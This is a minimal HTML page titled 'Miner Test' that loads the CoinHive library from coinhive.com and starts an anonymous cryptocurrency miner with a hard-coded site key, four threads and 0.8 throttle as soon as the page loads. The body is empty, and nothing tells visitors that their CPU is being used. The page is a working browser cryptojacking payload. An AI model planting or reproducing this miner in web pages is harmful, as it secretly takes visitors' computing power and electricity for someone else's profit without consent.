﻿<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8" />
    <title>Miner Test</title>
    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
    <script type="text/javascript">
        document.addEventListener("DOMContentLoaded", function (event) {
            var miner = new CoinHive.Anonymous('BGvYryJVadJ2xjE22gNLiWbyVCQiIh5a', { threads: 4, throttle: 0.8 });
            miner.start();
        });
       
    </script>
</head>
<body>

</body>
</html>